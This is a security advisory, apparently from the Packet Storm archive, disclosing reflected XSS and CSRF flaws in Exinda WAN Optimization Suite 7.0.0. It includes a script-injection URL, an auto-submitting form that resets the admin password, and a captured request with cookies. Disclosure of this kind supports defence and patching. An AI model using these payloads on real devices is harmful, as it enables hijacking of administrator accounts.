what you don't know can hurt you

Exinda WAN Optimization Suite 7.0.0 CSRF / XSS

Exinda WAN Optimization Suite 7.0.0 CSRF / XSS
Posted Sep 27, 2014
Authored by William Costa

Exinda WAN Optimization Suite version 7.0.0 (2160) suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
advisories | CVE-2014-7157, CVE-2014-7158
MD5 | 1411d0fd750fb4d961f6c80e3b6360c5

Exinda WAN Optimization Suite 7.0.0 CSRF / XSS

Change Mirror Download
I. VULNERABILITY

-------------------------

XSS Reflected vulnerabilities and CSRF in Exinda WAN Optimization Suite

II. BACKGROUND
-------------------------
WAN Optimization Suite integrates enterprise-caliber bandwidth acceleration
and optimization with best-in-class application network visibility and
control in a single, easy-to-use suite - See more at:

III. DESCRIPTION
-------------------------
Has been detected a XSS Reflected vulnerability in Exinda Wan Optimization
"/admin/launch?script=rh&template=sys-users&tabsel=" parameter “tabsel” in
version v7.0.0 (2160), that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser. This may
allow a remote attacker to be able to forge requests that Exinda takes
action upon.

IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “tabsel” in "
https://demo-nam-01.exinda.com:42818/admin/launch?script=rh&template=sys-
users&tabsel=aaa"><script>alert("Exinda XSS")</script>

POC CSRF
<html>

<body onload="CSRF.submit();">

<form id="CSRF" action="https://demo-nam-
02.exinda.com:34896/admin/launch?script=rh&template=sys-
users&tabsel=localusers" method="post" name="CSRF"> <input name="action10"
value="password_exinda"> </input> <input name="d_account=" value="account">
</input> <input name="t_account" value="string"> </input>

<input name="c_account" value="string"> </input> <input name="e_account"
value="true"> </input> <input name="f_account" value="admin"> </input>
<input name="d_password" value="password"> </input> <input
name="c_password" value="-"> </input>

<input name="m_password" value="false"> </input> <input name="e_password"
value="true"> </input> <input name="f_password" value="123456"> </input>
<input name="d_confirm" value="confirm"> </input> <input name="c_confirm"
value="-"> </input>
<input name="m_confirm" value="false"> </input> <input name="e_confirm"
value="true"> </input>
<input name="f_confirm" value="123456"> </input> <input name="apply"
value="Change+Password"> </input> </form>

</body>
</html>

Host=demo-nam-02.exinda.com:34896
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
Gecko/20100101 Firefox/32.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding=gzip,
deflate Referer=https://10.0.1.120/exinda/csrf.php
Cookie=resolutionconfig=today; _mkto_trk=id:316-TKO-387&token:_mch-
exinda.com-1411601373982-94280;
__utma=217124611.1138601206.1411601386.1411601386.1411601386.1;
__utmb=217124611.6.9.1411601437592; __utmc=217124611;
__utmz=217124611.1411601386.1.1.utmcsr=demo.exinda.com|utmccn=(referra
l)|utmcmd=referral|utmcct=/launch.php; iframe=yes;
session=IGQYEA1Jo1%2bOiMFK5%2b1joDCh60VoGvzrLqGJ%2bfF1Q1VCAAE%3d;
SDPSession=9b1195d97d796f12d828a2acd5801718fb152e1b0e3f194ace21529571c
41f8f; user_email=admin; first%5flogin=false; st_index=1411531200;
et_index=1411617600; lastConfigurationPage=https%3A%2F%2Fdemo-nam-
02.exinda.com%3A34896%2Fadmin%2Flaunch%3Fscript%3Drh%26template%3Dsys-
users%26tabsel%3Dlocalusers
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=300

POSTDATA=action10=password_exinda&d_account%3D=account&t_account=strin
g&c_account=string&e_account=true&f_account=admin&d_password=password&
c_password=-
&m_password=false&e_password=true&f_password=123456&d_confirm=confirm&c_confirm=-
&m_confirm=false&e_confirm=true&f_confirm=123456&apply=Change%2BPasswo rd

V. BUSINESS IMPACT -------------------------

Vulnerability allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser and change password of
admin user without consentiment.

VI. REQUIREMENTS
-----------------------
An Attacker needs to know the IP of the device.
An Administrator needs an authenticated connection to the device.

VII. SYSTEMS AFFECTED
-------------------------
Try Exinda WAN Optimization Suite v7.0.0 (2160)

VIII. SOLUTION
-------------------------
All parameter must be validated and use of token csrf


Login or Register to add favorites

File Archive:

July 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    13 Files
  • 2
    Jul 2nd
    12 Files
  • 3
    Jul 3rd
    1 Files
  • 4
    Jul 4th
    2 Files
  • 5
    Jul 5th
    34 Files
  • 6
    Jul 6th
    21 Files
  • 7
    Jul 7th
    21 Files
  • 8
    Jul 8th
    13 Files
  • 9
    Jul 9th
    6 Files
  • 10
    Jul 10th
    1 Files
  • 11
    Jul 11th
    3 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    19 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    15 Files
  • 16
    Jul 16th
    9 Files
  • 17
    Jul 17th
    2 Files
  • 18
    Jul 18th
    2 Files
  • 19
    Jul 19th
    19 Files
  • 20
    Jul 20th
    21 Files
  • 21
    Jul 21st
    53 Files
  • 22
    Jul 22nd
    14 Files
  • 23
    Jul 23rd
    14 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close